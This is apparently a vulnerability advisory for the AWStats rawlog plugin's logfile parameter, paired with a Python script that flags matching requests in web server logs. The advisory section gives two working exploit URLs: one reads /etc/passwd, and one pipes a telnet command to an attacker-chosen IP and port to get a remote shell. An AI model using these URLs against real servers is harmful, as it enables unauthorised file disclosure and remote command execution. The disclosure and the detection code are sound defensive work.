AWStats Rawlog Plugin Logfile Parameter Input Validation Vulnerability
No exploit is required. The following examples are available:

http://www.example.com/awstats.pl?filterrawlog=&rawlog_maxlines=5000&config=www.example.com&framename=main&pluginmode=rawlog&logfile=/etc/passwd

http://www.example.com/awstats.pl?filterrawlog=&rawlog_maxlines=5000&config=www.example.com&framename=main&pluginmode=rawlog&logfile=&logfile=|telnet <your ip> <port>

Here the '&config' parameter value is the configuration file for www.example.com. It is reported that the configuration filename can be harvested from the HTML source of the awstats page for the target site.
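As an added example (not part of the original advisory or of AWStats), the following Python code scans web server access-log lines for the request pattern shown above: awstats.pl called with pluginmode=rawlog and a logfile value that is an absolute path, contains '..', or contains a pipe. The sample log lines and the three heuristics are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format), not from the advisory.
SAMPLE_LOG = [
    '192.0.2.7 - - [01/Jan/2024:10:00:00 +0000] "GET /awstats.pl?filterrawlog='
    '&rawlog_maxlines=5000&config=www.example.com&framename=main'
    '&pluginmode=rawlog&logfile=/etc/passwd HTTP/1.1" 200 5120',
    '192.0.2.7 - - [01/Jan/2024:10:00:05 +0000] "GET /awstats.pl?config=www.example.com'
    '&pluginmode=rawlog&logfile=&logfile=%7Cexample-command HTTP/1.1" 200 312',
    '198.51.100.3 - - [01/Jan/2024:10:01:00 +0000] "GET /awstats.pl?config=www.example.com'
    '&framename=main HTTP/1.1" 200 20480',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def suspicious_logfile_values(request_target):
    """Return unsafe-looking 'logfile' values from an awstats.pl rawlog request."""
    parts = urlsplit(request_target)
    if not parts.path.endswith("awstats.pl"):
        return []
    # parse_qs percent-decodes values and keeps every repeated parameter,
    # so a second 'logfile=' after an empty first one is still inspected.
    params = parse_qs(parts.query, keep_blank_values=True)
    if "rawlog" not in params.get("pluginmode", []):
        return []
    return [
        value for value in params.get("logfile", [])
        # Assumed heuristics: absolute path, directory traversal, or pipe.
        if value.startswith("/") or ".." in value or "|" in value
    ]


def scan(lines):
    """Return (line_number, [suspicious values]) for each matching log line."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match:
            bad = suspicious_logfile_values(match.group(1))
            if bad:
                findings.append((number, bad))
    return findings


if __name__ == "__main__":
    for number, values in scan(SAMPLE_LOG):
        print(f"line {number}: suspicious logfile value(s): {values}")
```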